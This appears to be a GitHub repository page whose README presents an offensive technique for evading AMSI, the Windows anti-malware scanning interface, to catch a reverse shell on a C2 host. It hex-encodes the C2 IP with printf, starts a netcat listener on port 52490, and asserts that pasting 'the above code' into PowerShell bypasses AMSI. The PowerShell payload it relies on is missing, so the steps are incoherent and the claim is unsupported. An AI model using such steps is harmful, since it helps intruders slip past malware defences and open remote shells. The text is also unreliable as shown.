Skip to content

Devshimitsu/AMSI-Evasion

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

AMSI-Evasion

First, let’s obfuscate our IP address to simple hex. My C2 Host IP is be 192.168.0.1 which stands for 192 = c0, 168=a8, 0=0, 1=1

printf "%x,%x,%x,%x\n" 192 168 0 1

Now, if you start a netcat listener on port 52490, and enter the above code into PowerShell, it evades AMSI.

nc -lnvp 52490

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published